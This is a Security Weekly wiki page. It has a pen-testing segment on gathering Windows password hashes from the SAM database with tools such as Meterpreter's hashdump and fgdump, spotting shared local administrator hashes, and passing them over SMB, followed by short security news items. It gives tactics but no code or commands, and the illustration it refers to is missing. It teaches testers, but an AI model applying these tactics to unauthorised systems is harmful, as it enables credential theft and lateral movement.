From Security Weekly Wiki
Jump to navigationJump to search

Tech Segment: Pass The Hash, Hold The Salt

We've mentioned it on the show before, referenced it several times in various publications, SANS covers it in many courses (SEC560 has almost an entire day on password cracking), but here's a little tuttorial on how to put it all together. What am I talkin about? Windows hashes, either LANMAN or NTLM, they are litteraly the keys to the kingdom. First, you need to collect them by:

  • Sniffing them off of the network
  • Gaining SYSTEM level access to a system and grabbing the SAM database
  • Gaining user level privileges to a system and grabbing the backup

I won't go into a lot of detail about the above, because well, we've been there before. So, lets say for example you compromise a system on the internal (or external) network. The first thing you should do (After your happy dance of pwnage) is to grab the SAM database. You can do that with:

  • Metasploit - Meterpreter.dll "hashdump" command
  • Core IMPACT - "Dump Passwords From SAM"
  • fgdump - Excellent tool for dumping passwords (I upload it to NT 4.0 systems because Core doesn't support them for password dumping)

So, you go along and try to crack those hashes with john, which can have sexy results most of the time. However, remember you can also pass the hash too! But first, you must choose which hashes to pass. I try to determine if there is a shared local administrator password amounst systems. If I've compromised a bunch of systems I will review the hashes and look for similarities. Remember, no salt, so if some systems have a username of "administrator" and others a username of "tom", one can deduce that an admin may have gotten sneaky and changed the local administrator username. So, grep, sort, and uniq are your friends, do some analysis of the hashes. To pass the hash, I've had great success using Core IMPACT's module "Install Agent Using SMB", as shown below:


Stories For Discussion

Stephen Northcutt's Security Predictions Page - [PaulDotCom] - Experts from the field weigh in on security predictions. You know, I've changed my mind about predictions. I've decided that they are fun to make because you can think big and outlandish, and hey, its just a prediction. I make some more serious predictions, as do Josh Wright, Eric Cole, Rob Lee, and several others..

Tcpdump and Libpcap Updates - [PaulDotCom] - I have to tell you, while wireshark is all sexy, gui, and pretty, I MUCH perfer tcpdump. There is something just so familiar to me and comfortable about the command line (in fact, I have been actually enjoying windows by using more of the command line). I also found it interesting in the release notes when it mentions "Add support for Bluetooth Sniffing", really?

Metadata, PDF files, and watching attackers - [PaulDotCom] - I don't recommend actually watching hackers. For one, most are not super models (nor are many of them actually females), second, its pretty boring to watch someone type, even if they are doing cool, sexy hacking things. But here is a way to look into how an attacker created a malicious PDF, how long it took, what version he used to create it, etc... I like this idea, using metadata techniques against the attackers!

SOHO Router Wireless Security Report - [PaulDotCom] - This paper details some attacks against SOHO routers. First, they go over the DHCP name XSS vulnerability, which can execute XSS vulns against an administrator. Another attack, which I thought was neat, what that they registered their hostname with DHCP as "www.google.com", and got the router to update its DNS cache accordingly so that www.google.com resolved to a local IP address. So, if you have a Linksys WRT160N, D-Link DIR-615, Belkin F5D8233-4v3, or ActionTec MI424-WR you want to read this paper :)

Caller-ID Spoofing = Voicemail access - [PaulDotCom] - Voicemail can contain sensitive information (never leave passwords on someone's voicemail). Also, information gathering potential is huge. Set a pin!

I <3 Protocol Attacks - [PaulDotCom] - The main reason I love design flaws is that they stick around a lot longer than software vulnerabilities. Simply because they are harder to fix :) SMBrelay was great, and let me tell ya, you can have a FIELD DAY with it :)